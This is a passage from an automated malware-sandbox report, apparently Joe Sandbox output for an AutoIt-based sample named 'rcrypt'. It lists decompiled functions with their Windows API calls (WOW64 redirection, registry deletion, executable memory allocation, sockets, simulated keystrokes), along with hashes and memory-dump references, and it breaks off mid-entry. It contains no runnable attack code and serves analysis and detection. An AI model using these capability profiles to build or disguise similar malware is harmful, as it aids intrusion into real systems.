Instruction ID: 2c8f2c1b1b5d5ee9ca41a82211ad37b438791f09267f053ed318953f3b2b2ddb
Opcode Fuzzy Hash: 6ce1da97879a109b180214d27c53e972ad645df1d0fc13369931c7f9d195175c
Instruction Fuzzy Hash: 94D01730510727CFD7609F31DA1961776F5AF05791F11C83E988AD6950E770D8C1CA90

Function 000F4D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,000F4D2E,?,000F4F4F,?,001B62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 000F4D6F
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 000F4D81

Strings

Wow64DisableWow64FsRedirection, xrefs: 000F4D7B
kernel32.dll, xrefs: 000F4D6A

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 4b2d6c020559c9a93cd50e558ad476037b472b845f604cd3aba407b4e8d5949a
Instruction ID: 855c266c2192be3b66540ec77b95ee7042077ca817bdbf7192a34e6fad042df1
Opcode Fuzzy Hash: 4b2d6c020559c9a93cd50e558ad476037b472b845f604cd3aba407b4e8d5949a
Instruction Fuzzy Hash: 51D01730510713CFD7209F31DC0862776E8AF16362F11C83EA88AD6A90E770D8C1CA50

Function 000F4D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,000F4CE1,?), ref: 000F4DA2
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 000F4DB4

Strings

kernel32.dll, xrefs: 000F4D9D
Wow64RevertWow64FsRedirection, xrefs: 000F4DAE

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: a082b1afc982493e327dfbd4ecb50040d2cef794624ee1533c76da602b957aa3
Instruction ID: 4c6810092568cf8cb65e11fe35031c394b4c0bb1759e8e78be6a4420b3f9e75e
Opcode Fuzzy Hash: a082b1afc982493e327dfbd4ecb50040d2cef794624ee1533c76da602b957aa3
Instruction Fuzzy Hash: 95D0E231550712CFD7209B31D808A5776E4AF06355F12883EE98AD6990E770D8C0CA50

Function 00171072 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,001712C1), ref: 00171080
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00171092

Strings

advapi32.dll, xrefs: 0017107B
RegDeleteKeyExW, xrefs: 0017108C

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: a5d5b3b144b2450c4478f0e1b86e438487c50a9d69c8eca29c535c6a7ee01fbf
Instruction ID: 26fb1cfd77f57c52b52d6430915cec84663acbd5394ee580d00db57645aa1012
Opcode Fuzzy Hash: a5d5b3b144b2450c4478f0e1b86e438487c50a9d69c8eca29c535c6a7ee01fbf
Instruction Fuzzy Hash: 33D0E234510752DFD7209B39D858A1B7AF5AF06361B11C82EA48ADA550E770D8C0CA50

Function 001693F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,00169009,?,0017F910), ref: 00169403
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00169415

Strings

GetModuleHandleExW, xrefs: 0016940F
kernel32.dll, xrefs: 001693FE

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 27ca007db9eb365a18ca39c95c5697cebda4abd01179c2c8508bdf7cd5679602
Instruction ID: 3cd820b7c29a0d69c56f8e3aa4ee1ed6b3c4998c94d4d54f912815e88de16d3c
Opcode Fuzzy Hash: 27ca007db9eb365a18ca39c95c5697cebda4abd01179c2c8508bdf7cd5679602
Instruction Fuzzy Hash: 8BD01774654713CFD7209F31DE4862776E9AF05352F51C83EA48AD6950EB70C8C1CA50

Function 001476C5 Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 146cfccbc56e36e6409f5e79ab72b8eb185a9bd93502b1ee85fa81a3a6183bfe
Instruction ID: 655b441e23c658732b3b139a28c9371b8ee2ada9d440c52824b0d88580203067
Opcode Fuzzy Hash: 146cfccbc56e36e6409f5e79ab72b8eb185a9bd93502b1ee85fa81a3a6183bfe
Instruction Fuzzy Hash: 61C16075A04216EFCB14CF94C888EAEB7F5FF48714B258599E805EB2A1D730ED81CB90

Function 0016E33E Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 0016E3D2
CharLowerBuffW.USER32(?,?), ref: 0016E415

Part of subcall function 0016DAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0016DAD9

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0016E615
_memmove.LIBCMT ref: 0016E628

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: 475014e607283808abc1bdde65967c4551894ca6740857830ccbb3217f9d1ae1
Instruction ID: 0c093e2e9984694a16627f3710a3857397f680c3a8fa6fba675f7ce9bbf0b8dd
Opcode Fuzzy Hash: 475014e607283808abc1bdde65967c4551894ca6740857830ccbb3217f9d1ae1
Instruction Fuzzy Hash: E6C15A75A083019FC714DF28C88096ABBE4FF88714F148A6DF99A9B351D770E956CF82

Function 001683A8 Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 001683D8
CoUninitialize.OLE32 ref: 001683E3

Part of subcall function 0014DA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0014DAC5

VariantInit.OLEAUT32(?), ref: 001683EE
VariantClear.OLEAUT32(?), ref: 001686BF

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 2bf83adb04cafaed1c53577923a383b28dade9b2c6abbffc5732e2ff14ca65e2
Instruction ID: 343c013621486bec3e87e862568c0936f8d9949a035d85f37a0ccdd8fd6a5267
Opcode Fuzzy Hash: 2bf83adb04cafaed1c53577923a383b28dade9b2c6abbffc5732e2ff14ca65e2
Instruction Fuzzy Hash: A4A189752047019FCB10DF28C881B6AB7E4BF88354F15854CFA9A9B7A2CB70EC54DB82

Function 00147A78 Relevance: 6.2, APIs: 4, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00182C7C,?), ref: 00147C32
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00182C7C,?), ref: 00147C4A
CLSIDFromProgID.OLE32(?,?,00000000,0017FB80,000000FF,?,00000000,00000800,00000000,?,00182C7C,?), ref: 00147C6F
_memcmp.LIBCMT ref: 00147C90

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 23e0f8e95b570c35964a4ad472c82e2d985147575106121422178fdf53423b11
Instruction ID: d7af4477b29be058a6653a01b7a583b8365d4a320c6960059be6ebe7ae9aff10
Opcode Fuzzy Hash: 23e0f8e95b570c35964a4ad472c82e2d985147575106121422178fdf53423b11
Instruction Fuzzy Hash: 25812B71A0010AEFCB04DF94C984EEEB7B9FF89315F204599E505AB260DB71AE46CB61

Function 00146DF3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00146E04
SysAllocString.OLEAUT32(00000000), ref: 00146EAD
VariantCopy.OLEAUT32 ref: 00146EDC
VariantClear.OLEAUT32(?), ref: 00146F03

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 1d6f7e874fed0c7ecee42e84ccc7019de4a69f5fa8a9535cfd624f05d9a51eeb
Instruction ID: e24fbef0aa5ee99b0ffeefd3017aaf86c63ac037dbfef3ee30a7c478fb5d3baa
Opcode Fuzzy Hash: 1d6f7e874fed0c7ecee42e84ccc7019de4a69f5fa8a9535cfd624f05d9a51eeb
Instruction Fuzzy Hash: A351CB306043019BDB24AF65E495B7AB3E5EF5A310F20881FF596DB6F2DB7098849B12

Function 00166CBD Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00166CE4
WSAGetLastError.WSOCK32(00000000), ref: 00166CF4

Part of subcall function 000F9997: __itow.LIBCMT ref: 000F99C2
Part of subcall function 000F9997: __swprintf.LIBCMT ref: 000F9A0C

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00166D58
WSAGetLastError.WSOCK32(00000000), ref: 00166D64

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: c3b9fc7f886cd560d12ec7f82c9613f8fbede84f74dd486673c12679984c59e5
Instruction ID: 67d2c61e8a0a73ee441e20b631722e9ed33f85b0bf1403104db63131f7c527a7
Opcode Fuzzy Hash: c3b9fc7f886cd560d12ec7f82c9613f8fbede84f74dd486673c12679984c59e5
Instruction Fuzzy Hash: 8A41BF74740204AFEB24AF24DC86FBA77E9AB04B10F44801CFB599B6D3DB759C419B91

Function 0016672D Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0017F910), ref: 001667BA
_strlen.LIBCMT ref: 001667EC

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: da814ea9d0d0b4d46792f7c3137ae6488dcdefa44d536fb8b21ea6708a2096d4
Instruction ID: dde8b652cf1c4853017094236915586dbee47b87ff21ae0da87268ffd6f40768
Opcode Fuzzy Hash: da814ea9d0d0b4d46792f7c3137ae6488dcdefa44d536fb8b21ea6708a2096d4
Instruction Fuzzy Hash: 8341D531A00208ABCB14EB74DCC1FFEB7ADAF18314F148169FA1997292DB30AD51C791

Function 0015BA5F Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0015BB09
GetLastError.KERNEL32(?,00000000), ref: 0015BB2F
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0015BB54
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0015BB80

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 5e96ac03c0bc2c84c8888f28a7c1bb1479bc0732fbf59b94a4213c8ff5f301f7
Instruction ID: 94e2e24035baace06c6edb927fac123a5fac7280e0f94481ecda457d75fe3274
Opcode Fuzzy Hash: 5e96ac03c0bc2c84c8888f28a7c1bb1479bc0732fbf59b94a4213c8ff5f301f7
Instruction Fuzzy Hash: E9413539204614DFCB10EF18C584AA9BBF1EF89310B098488ED5A9FB62CB70FD45DB91

Function 0017ADF1 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0017AE1A
GetWindowRect.USER32(?,?), ref: 0017AE90
PtInRect.USER32(?,?,0017C304), ref: 0017AEA0
MessageBeep.USER32(00000000), ref: 0017AF11

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 9c757994a2bebf91e51ffbb26e8273796213fb4cba0132e668213c7ae5491b2f
Instruction ID: 957ed385616e8f4ea219aceec00fb01e624952643e283100d4b260ea56145cd6
Opcode Fuzzy Hash: 9c757994a2bebf91e51ffbb26e8273796213fb4cba0132e668213c7ae5491b2f
Instruction Fuzzy Hash: 4A416D71600219DFCB11CF58C884AAD7BF5FF99350F54C1A9E41D9B251DB30A982DB92

Function 00150FE6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00151037
SetKeyboardState.USER32(00000080,?,00000001), ref: 00151053
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 001510B9
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 0015110B

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 84078023c9e8e79bc02042354f275e4e8e34662ebfca637fa9bf5145ca40e612
Instruction ID: 6eeccaa292ef7385c72fff5a6e3c7f9970667d49292bd1ef14305e54f859826e
Opcode Fuzzy Hash: 84078023c9e8e79bc02042354f275e4e8e34662ebfca637fa9bf5145ca40e612
Instruction Fuzzy Hash: 73313930E40698FEFB368A65CC05BFEBBA9AB48312F04431AFDA45A1D1C37489C99751

Function 00151121 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,753DC0D0,?,00008000), ref: 00151176
SetKeyboardState.USER32(00000080,?,00008000), ref: 00151192
PostMessageW.USER32(00000000,00000101,00000000), ref: 001511F1
SendInput.USER32(00000001,?,0000001C,753DC0D0,?,00008000), ref: 00151243

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 4d135b1c9aeea583bd8cbab2e2d6e06e4b526a15296ea48d1824c8f91d0f5952
Instruction ID: 514d40b6a1b80c7a8445de91e2e85d80ce872cb1667b72d4de30a958d0d0fded
Opcode Fuzzy Hash: 4d135b1c9aeea583bd8cbab2e2d6e06e4b526a15296ea48d1824c8f91d0f5952
Instruction Fuzzy Hash: CD316B30940A08FEEF268A75CC047FA7BBAAB59312F14439EF9B19A1D1C3744D8D8751

Function 00126415 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0012644B
__isleadbyte_l.LIBCMT ref: 00126479
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 001264A7
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 001264DD

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 8a6d7c7c8a734da27de827a20b955b7786e1705f3521a6a5c484047d961e2067
Instruction ID: dab22eb3b265c056d8bf72abdc4b89c9e02bb18d5f185614b5fae214e78a427a
Opcode Fuzzy Hash: 8a6d7c7c8a734da27de827a20b955b7786e1705f3521a6a5c484047d961e2067
Instruction Fuzzy Hash: F631C1316042A6EFDB25AF65EC45BBA7BB5FF40320F154029F8A4871D1E731D8A1DB90

Function 00175175 Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00175189

Part of subcall function 0015387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00153897
Part of subcall function 0015387D: GetCurrentThreadId.KERNEL32 ref: 0015389E
Part of subcall function 0015387D: AttachThreadInput.USER32(00000000,?,001552A7), ref: 001538A5

GetCaretPos.USER32(?), ref: 0017519A
ClientToScreen.USER32(00000000,?), ref: 001751D5
GetForegroundWindow.USER32 ref: 001751DB

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: b3105f2028e4792597a51737db2249f6174bb1d1ae01632f1193364141491495
Instruction ID: b7d683045d7341b6040e492a76c6951424b3efb5df7f65ba47aa77cbb70eb357
Opcode Fuzzy Hash: b3105f2028e4792597a51737db2249f6174bb1d1ae01632f1193364141491495
Instruction Fuzzy Hash: 58310D71900108AFDB04EFA5CC85AEFB7F9EF98304F10406AE515E7252EA759E45CBA1

Function 0017C788 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000F2612: GetWindowLongW.USER32(?,000000EB), ref: 000F2623

GetCursorPos.USER32(?), ref: 0017C7C2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0012BBFB,?,?,?,?,?), ref: 0017C7D7
GetCursorPos.USER32(?), ref: 0017C824
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0012BBFB,?,?,?), ref: 0017C85E

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
